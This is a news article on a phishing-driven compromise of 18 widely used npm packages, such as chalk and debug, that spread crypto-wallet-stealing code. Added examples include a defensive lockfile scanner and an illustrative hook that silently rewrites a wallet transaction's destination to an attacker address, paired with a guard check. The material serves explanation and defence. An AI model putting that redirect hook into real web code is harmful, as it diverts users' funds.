Powered by MOMENTUM MEDIA
18 popular JavaScript code packages hacked to spread malware

Eighteen npm packages, together downloaded more than 2 billion times a week, were compromised through a phishing attack on their maintainer and used in an attempt to spread cryptocurrency-stealing malware.


The maintainer of several highly popular npm packages, including debug and chalk, has revealed he was recently the victim of a phishing attack that led to the compromise of 18 packages under his account.

“Yep, I’ve been pwned. 2FA reset email, looked very legitimate,” Josh Junon said in a 9 September post to Bluesky.

“Only NPM affected. I’ve sent an email off to @npmjs.bsky.social to see if I can get access again.

“Sorry everyone, I should have paid more attention. Not like me; have had a stressful week. Will work to get this cleaned up.”

The phishing email was made to look like an official npm message, complete with npm branding, and was sent from support[at]npmjs[dot]help, a lookalike domain the attacker controlled rather than the genuine npmjs.com.

Soon after, the unidentified threat actor used the stolen access to publish versions containing malicious code for the following packages:

  • backslash (0.26 million downloads per week)
  • chalk-template (3.9 million downloads per week)
  • supports-hyperlinks (19.2 million downloads per week)
  • has-ansi (12.1 million downloads per week)
  • simple-swizzle (26.26 million downloads per week)
  • color-string (27.48 million downloads per week)
  • error-ex (47.17 million downloads per week)
  • color-name (191.71 million downloads per week)
  • is-arrayish (73.8 million downloads per week)
  • slice-ansi (59.8 million downloads per week)
  • color-convert (193.5 million downloads per week)
  • wrap-ansi (197.99 million downloads per week)
  • ansi-regex (243.64 million downloads per week)
  • supports-color (287.1 million downloads per week)
  • strip-ansi (261.17 million downloads per week)
  • chalk (299.99 million downloads per week)
  • debug (357.6 million downloads per week)
  • ansi-styles (371.41 million downloads per week)

In total, the packages are downloaded more than 2 billion times every week. Soon after the malicious versions were published, cyber security firm Aikido began receiving alerts about the compromised packages, notified the maintainer and started an investigation.
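The first question a practitioner has after a list like the one above is which of those packages a project actually pulls in, at what version and where in the dependency tree, including copies nested under other dependencies. The following is an added example, not code from the article, from npm or from the affected projects. It scans a parsed package-lock.json in lockfileVersion 2 or 3 format, whose "packages" map is keyed by node_modules path; the sample lockfile and every version string in it are constructed placeholders and say nothing about which real versions were compromised.

```javascript
// Added example: report every copy of the 18 packages named in the article
// that a package-lock.json (lockfileVersion 2 or 3) pulls in, with version
// and tree path, so each can be checked against the versions in the advisory.

const AFFECTED_PACKAGES = new Set([
  "backslash", "chalk-template", "supports-hyperlinks", "has-ansi",
  "simple-swizzle", "color-string", "error-ex", "color-name", "is-arrayish",
  "slice-ansi", "color-convert", "wrap-ansi", "ansi-regex", "supports-color",
  "strip-ansi", "chalk", "debug", "ansi-styles",
]);

// The package name is whatever follows the last "node_modules/" in the key.
// This handles nested installs (node_modules/a/node_modules/chalk) and
// scoped names (node_modules/@scope/pkg).
function packageNameFromPath(path) {
  const marker = "node_modules/";
  const idx = path.lastIndexOf(marker);
  return idx === -1 ? null : path.slice(idx + marker.length);
}

function findAffected(lockfile) {
  if (!lockfile || typeof lockfile.packages !== "object") {
    throw new Error('expected a lockfileVersion 2 or 3 package-lock.json with a "packages" map');
  }
  const hits = [];
  for (const [path, meta] of Object.entries(lockfile.packages)) {
    if (path === "") continue; // the root project itself
    const name = packageNameFromPath(path);
    if (name && AFFECTED_PACKAGES.has(name)) {
      hits.push({
        name,
        version: meta.version,
        path,
        // true when this copy lives under another dependency, which is the
        // kind of install that `npm ls` at the top level is easy to overlook
        nested: path.indexOf("node_modules/") !== path.lastIndexOf("node_modules/"),
      });
    }
  }
  // Sort by name, then path, so multiple copies of one package sit together.
  return hits.sort((a, b) => a.name.localeCompare(b.name) || a.path.localeCompare(b.path));
}

// Collapse the hits to { name: [versions...] } for a quick comparison with
// the versions listed in the advisory.
function summarize(hits) {
  const byName = new Map();
  for (const h of hits) {
    if (!byName.has(h.name)) byName.set(h.name, new Set());
    byName.get(h.name).add(h.version);
  }
  return Object.fromEntries([...byName].map(([n, v]) => [n, [...v].sort()]));
}

// Constructed sample lockfile (placeholder versions): chalk appears twice,
// once at top level and once nested under a hypothetical CLI tool; debug once;
// an unrelated package is ignored.
const SAMPLE_LOCKFILE = {
  name: "example-app",
  lockfileVersion: 3,
  packages: {
    "": { name: "example-app", version: "1.0.0" },
    "node_modules/chalk": { version: "2.0.0-sample" },
    "node_modules/some-cli": { version: "1.0.0-sample" },
    "node_modules/some-cli/node_modules/chalk": { version: "1.0.0-sample" },
    "node_modules/debug": { version: "3.0.0-sample" },
    "node_modules/lodash": { version: "1.0.0-sample" },
  },
};

function demo() {
  const hits = findAffected(SAMPLE_LOCKFILE);
  return { hits, summary: summarize(hits) };
}
```

To run it against a real project, parse the lockfile first (for example `JSON.parse(fs.readFileSync("package-lock.json", "utf8"))`) and pass the object to `findAffected`; the output is a list of installed copies to compare with the advisory, not a verdict on its own.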

“The packages were updated to contain a piece of code that would be executed on the client of a website, which silently intercepts crypto and web3 activity in the browser, manipulates wallet interactions, and rewrites payment destinations so that funds and approvals are redirected to attacker-controlled accounts without any obvious signs to the user,” Aikido said in an 8 September blog post.

“What makes it dangerous is that it operates at multiple layers: altering content shown on websites, tampering with API calls, and manipulating what users’ apps believe they are signing. Even if the interface looks correct, the underlying transaction can be redirected in the background.”
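The behaviour Aikido describes, a script sitting between the page and the wallet so that the address the user sees and the address that is actually sent differ, is easier to reason about with a concrete model. The block below is an added illustration of that technique and of one defensive check, not the malicious payload from the compromised packages and not Aikido's code. It uses a constructed, synchronous stand-in for the browser's wallet provider (a real EIP-1193 provider is asynchronous) and placeholder addresses.

```javascript
// Added illustration, not the real payload: a hook on the wallet provider's
// request() rewrites the `to` field of outgoing transactions after the page
// has already rendered the intended destination. Addresses are constructed.

const INTENDED_TO = "0x1111111111111111111111111111111111111111"; // constructed
const ATTACKER_TO = "0x2222222222222222222222222222222222222222"; // constructed
const SENDER      = "0x3333333333333333333333333333333333333333"; // constructed

// Stand-in for window.ethereum: records every eth_sendTransaction it receives.
// Synchronous for the sake of the example; a real provider returns promises,
// and the hook below passes return values through unchanged either way.
function makeMockProvider() {
  const sent = [];
  return {
    sent,
    request({ method, params }) {
      if (method === "eth_sendTransaction") {
        sent.push(params[0]);
        return "0xconstructed-tx-hash";
      }
      throw new Error(`unsupported method: ${method}`);
    },
  };
}

// What a malicious dependency bundled into the page could do: wrap request(),
// swap the destination on eth_sendTransaction, and forward everything else
// untouched so the calling code sees no error and no change in behaviour.
function installRedirectHook(provider, attackerAddress) {
  const original = provider.request.bind(provider);
  provider.request = function (args) {
    if (args && args.method === "eth_sendTransaction" && Array.isArray(args.params)) {
      const [tx, ...rest] = args.params;
      return original({ ...args, params: [{ ...tx, to: attackerAddress }, ...rest] });
    }
    return original(args);
  };
}

// The web app's own payment path. `shownToUser` is what the page renders in
// its confirmation dialog; it is computed before the call reaches the
// provider, so it still looks correct when the transaction is redirected.
function sendPayment(provider, to, valueWei) {
  const tx = { from: SENDER, to, value: valueWei };
  const shownToUser = tx.to;
  const hash = provider.request({ method: "eth_sendTransaction", params: [tx] });
  return { shownToUser, hash };
}

// Defensive check: snapshot the provider's request function as early as the
// page can (before third-party bundles execute) and refuse to send if it has
// been replaced since. It only helps when the snapshot really is taken first.
function makeProviderGuard(provider) {
  const trusted = provider.request;
  return {
    isIntact: () => provider.request === trusted,
    send(to, valueWei) {
      if (!this.isIntact()) throw new Error("provider.request was replaced; refusing to send");
      return sendPayment(provider, to, valueWei);
    },
  };
}

// Walk-through: the guard snapshots first, then the hook lands (as a dependency
// loaded later would), then the unguarded and guarded send paths are compared.
function demo() {
  const provider = makeMockProvider();
  const guard = makeProviderGuard(provider);
  installRedirectHook(provider, ATTACKER_TO);

  const unguarded = sendPayment(provider, INTENDED_TO, "0x2386f26fc10000");
  const actualDestination = provider.sent[0].to;

  let guardBlocked = false;
  try { guard.send(INTENDED_TO, "0x2386f26fc10000"); } catch { guardBlocked = true; }

  return { shownToUser: unguarded.shownToUser, actualDestination, guardBlocked };
}
```

The point of `demo()` is the mismatch: `shownToUser` is the intended address while `actualDestination` is the attacker's, with no error on the app side. The identity check in `makeProviderGuard` is deliberately modest; it catches a wrapper installed after the snapshot but not one that ran earlier in the bundle, and the wallet's own confirmation screen remains the last place the true destination is visible.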

According to Aikido, the malicious domain was registered several days before the successful phishing attempt.

The maintainer was able to remove the compromised versions of most of the packages; however, the malicious version of one of them, simple-swizzle, was still live at the time of writing.

npm was acquired by GitHub in 2020 and describes itself as “a critical part of the JavaScript community” that supports “one of the largest developer ecosystems in the world”.

David Hollingworth

David Hollingworth has been writing about technology for over 20 years, and has worked for a range of print and online titles in his career. He is enjoying getting to grips with cyber security, especially when it lets him talk about Lego.
